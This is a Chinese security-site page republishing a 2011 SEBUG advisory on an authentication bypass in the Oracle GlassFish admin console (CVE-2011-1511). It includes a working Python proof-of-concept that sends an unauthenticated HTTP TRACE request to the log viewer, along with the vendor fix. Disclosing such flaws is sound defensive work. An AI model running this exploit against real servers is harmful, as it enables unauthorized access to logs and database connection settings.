幽灵学院 - 菜鸟起航从这里开始!

幽灵学院 - 中国最权威的网络安全门户网站!

当前位置: > 安全漏洞 > Other >

Oracle GlassFish Server管理控制台远程验证绕过漏洞

SEBUG-ID:20554 SEBUG-Appdir:Oracle 发布时间:2011-05-12 影响版本: Sun Glassfish Enterprise Server 2.1.1Oracle Glassfish Server 3.0.1 漏洞描述: Bugtraq ID: 47818CVE ID:CVE-2011-1511Sun GlassFish Enterprise Server是一款构建和部署下一代应用程
SEBUG-ID:20554 SEBUG-Appdir:Oracle 发布时间:2011-05-12 影响版本: Sun Glassfish Enterprise Server 2.1.1Oracle Glassfish Server 3.0.1 漏洞描述: Bugtraq ID: 47818CVE ID:CVE-2011-1511Sun GlassFish Enterprise Server是一款构建和部署下一代应用程


  

SEBUG-ID:20554

SEBUG-Appdir:Oracle

发布时间:2011-05-12

影响版本:

Sun Glassfish Enterprise Server 2.1.1 Oracle Glassfish Server 3.0.1

漏洞描述:

Bugtraq ID: 47818 CVE ID:CVE-2011-1511 Sun GlassFish Enterprise Server是一款构建和部署下一代应用程序和服务的开源和开放社区平台。 管理控制台允许通过HTTP TRACE方法无需验证进行访问,攻击者可以利用此漏洞绕过验证机制获得对某些信息的访问,如日志查看器或JDBC连接池属性信息

<*参考
*>

测试方法:

[]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/env python import sys import httplib def make_trace_request(host, port, selector): print '[*] TRACE request: %s' % selector headers = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)', 'Host': '%s:%s' % (host, port), 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-us,en;q=0.5', 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Accept-Encoding': 'gzip,deflate', 'Connection': 'close', 'Referer': 'http://%s:%s%s' % (host, port, selector)} conn = httplib.HTTPConnection(host, port) conn.request('TRACE', selector, headers=headers) response = conn.getresponse() conn.close() print response.status, response.reason print response.getheaders() print response.read() if len(sys.argv) != 3: print "Usage: $ python poc.py <GlassFish_IP> <GlassFish_Administration_Port>\nE.g: $ python poc.py 192.168.0.1 4848" sys.exit(0) host = sys.argv[1] port = int(sys.argv[2]) make_trace_request(host, port, '/common/logViewer/logViewer.jsf')

SEBUG安全建议:

厂商解决方案 Oracle Glassfish Server 3.1已经修复此漏洞,建议用户下载使用:

// sebug.net [2011-05-13]

为了更全面保护您的电脑安全,防止各种漏洞攻击,黑白网络推荐您使用系统安全程序金山卫士,它独家采用双引擎技术,云引擎能查杀上亿已知木马,独有的本地V10引擎可全面清除感染型木马;漏洞检测针对windows7优化,速度比同类软件快10倍;更有实时保护、软件管理、插件清理、修复IE、启动项管理等功能,全面保护您的系统安全。 金山卫士下载地址:

(责任编辑:幽灵学院)
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
用户名: 验证码: 点击我更换图片
栏目列表
推荐内容
1700055555@qq.com 工作日:9:00-21:00
周 六:9:00-18:00
  扫一扫关注幽灵学院